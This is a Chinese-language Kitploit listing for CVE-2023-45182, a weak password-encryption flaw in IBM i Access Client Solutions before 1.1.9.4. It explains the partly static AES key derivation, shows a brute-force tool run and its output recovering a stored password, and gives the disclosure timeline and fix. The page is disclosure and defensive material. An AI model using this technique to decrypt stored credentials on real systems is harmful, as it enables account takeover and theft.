Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/afine-com/cve-2023-45182
密码破解加密/解密工具漏洞分析漏洞利用密码学
GitHubafine-com/cve-2023-45182

CVE-2023-45182

IBM i Access Client Solutions < 1.1.9.4 - 弱密码加密

查看仓库
22年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-45182

IBM i Access Client Solutions < 1.1.9.4 - 弱密码加密

时间线

  • 向供应商报告漏洞:2023-09-22
  • 发布修复版本 1.1.9.4:2023-12-08
  • 公开披露:2023-12-15

描述

IBM i Access Client Solutions 在存储用户密码时使用 AES 算法,但 16 字节加密密钥是由静态字符串(Thanatos)与来自另一个静态字符串(Behemoth)加上用户名、用户主文件夹、操作系统(例如 Linux)以及启动应用程序时的当前目录组合而成的字符串中的随机字符拼接而成。因此,加密密钥的一半是静态的(字符串 Thanatos),而另一半则非常有限。这使得攻击者即使在单个 CPU 核心上也能轻松暴力破解密码。

以下是使用 mkubiak 账户下的 as400_password_bruteforce_tool.java 脚本解密 mmajchrowicz 用户密码的示例:

root@kitploit:~
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ java as400_password_bruteforce_tool.java mmajchrowicz_funciton_admin_work.bin Linux mmajchrowicz /opt

IBM AS400 Password Bruteforce Tool v0.3 by Michał Majchrowicz AFINE Team

Full keyspace: mmajchrowiczLinux/opt/home/mmajchrowiczBehemoth
Full keyspace length: 47

Reduced keyspace: BmajchrowizLnux/pte
Reduced keyspace length: 19

Found good pass: Thanatosaun/Lcmo

Encrypted system password 7 bytes:
2E 1B 10 0A 1B 0D 0A
Decrypted system password 7 bytes:
50 65 6E 74 65 73 74

Decrypted system password: Pentest

此问题是由于使用了弱密码加密造成的。该问题已在 IBM i Access Client Solutions 1.1.9.4 中修复。

受影响版本

< 1.1.9.4

建议

将 IBM i Access Client Solutions 更新到 1.1.9.4 或更高版本。

参考文献

  • https://www.ibm.com/support/pages/node/7091942
  • https://nvd.nist.gov/vuln/detail/CVE-2023-45182
下载工具